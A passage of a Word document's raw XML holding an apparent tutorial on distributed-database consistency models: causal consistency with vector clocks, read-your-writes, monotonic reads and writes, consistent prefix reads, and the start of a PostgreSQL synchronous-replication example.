    <w:p w14:paraId="7040AF89" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Nobody sees Bob's "Congrats!" without also seeing Alice's post.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9B1FD7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    (Because B causally depends on A.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66216BB8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2E7259" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  But: Two unrelated posts by different users may appear in different orders on different nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE58784" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it's tracked:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C9BDD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144416A6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Vector clocks / version vectors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13259BF9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Each node maintains a vector of logical timestamps per node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DD65BE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Alice's write: vector = {Alice: 1, Bob: 0, Carol: 0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C94EC09" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Bob's reply (depends on Alice): vector = {Alice: 1, Bob: 1, Carol: 0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582FF015" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421A352A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  When a node receives Bob's reply, it WAITS until it also has Alice's write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02765671" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  (vector shows Bob's reply depends on Alice:1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DED9C9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Enforces causal ordering without enforcing TOTAL ordering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5055B85B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages over strong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038E5EB8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1584"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Higher availability (no global coordination needed — just track dependencies).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D45C4A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1584"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Lower latency (no quorum wait — just ensure causal order is preserved).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E53322" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1584"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Still preserves meaningful ordering (users never see effects without causes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE79EA9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Systems using causal consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> MongoDB (causal sessions), COPS (research system), some CRDT implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBE5DE2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Read-Your-Own-Writes (Read-After-Write) Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5524928C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantee:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> A client that writes a value will ALWAYS see that value (or newer) on subsequent reads. Other clients may see stale data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7716F0D4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4621EB67" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Client A: write(X=5) → ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E50A7F6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Client A: read(X) → ALWAYS returns 5 (or newer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17483E2B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="4985BB22" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Client B: read(X) → might return old value (eventual)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A68D414" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="129CDD1C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Guarantee is PER-CLIENT, not global.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DB267B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40601613" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413BA521" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t># Approach 1: Read from primary for your own data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283AAEBE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>def read(user_id, requesting_user):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4E7B00" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    if requesting_user == user_id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D18FE2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        return primary_db.read(user_id)  # Always fresh for own data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2989A5B3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A67A47" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return replica_db.read(user_id)  # May be stale for others' data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DADBCC0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="7D2EEC1C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t># Approach 2: Track write timestamp, ensure replica is caught up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C24F0A0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>def read(key, last_write_timestamp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002FE6BF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    replica = get_replica()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B3DED7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    if replica.replication_position &gt;= last_write_timestamp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3778B373" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        return replica.read(key)  # Replica has our write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8926BC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249FB99D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        return primary_db.read(key)  # Replica too stale, use primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA0822C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this matters:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> The most jarring user experience is writing something and immediately NOT seeing it. "I updated my name but the page still shows the old one." Read-your-writes prevents this specific failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAE8610" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 Monotonic Reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5859D081" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantee:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> Once a client reads a value at version N, subsequent reads will NEVER return a version older than N. Reads never "go back in time."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A0C3A7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7E8888" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Without monotonic reads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034878FD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Client reads from Replica A: sees comment posted at 14:30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E564280" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Client reads from Replica B: doesn't see the comment (Replica B is behind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E41F202" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  User thinks: "The comment disappeared?!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EE0879" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="60C7EA50" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>With monotonic reads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7074EF87" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  After seeing version N, all subsequent reads see version ≥ N.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51160088" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Once you see the comment, you'll always see it (or newer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F5039" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> Pin client to a specific replica (session affinity), or track the last-seen version and only accept responses from replicas at or beyond that version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50558D59" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 Monotonic Writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1C65B9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Guarantee:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> Writes from a single client are applied in the order they were issued. Write A issued before Write B is applied before B on all replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4577549B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF59574" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Without monotonic writes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21734022" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Client writes: X=1, then X=2, then X=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D702CA5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Replica might apply: X=1, X=3, X=2 → final value is X=2 (wrong!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336D9D0B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="0F2E8671" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>With monotonic writes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E84F8E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Writes applied in order: X=1, X=2, X=3 → final value is X=3 ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1940BE66" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.6 Consistent Prefix Reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D5114A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantee:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> If a sequence of writes occurs in a certain order, a reader sees them in that same order (no missing middle elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0005339B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62996E1D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Without consistent prefix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33224034" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Write sequence: A=1, B=2, C=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405E148" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Reader might see: A=1, C=3 (missing B=2?!) — violates causality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A0718E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="16312BBB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>With consistent prefix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776761EC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  If reader sees C=3, they've also seen A=1 and B=2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54249564" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  No "gaps" in the observed sequence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A840482" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="10675005">
          <v:rect id="_x0000_i6040" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ADA746" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Implementing Consistency in Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F6FD2D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 PostgreSQL — Strong Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5B6B87" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D39257C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- Synchronous replication (strong consistency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145FF82A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- postgresql.conf on primary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C02F4F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>synchronous_standby_names = 'FIRST 1 (replica1, replica2)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E3D18D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>synchronous_commit = on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EADE9E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="726B4FC7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- Write path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E07337" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- 1. Client: INSERT INTO accounts SET balance = 500 WHERE id = 42</w:t>
      </w:r>
    </w:p>
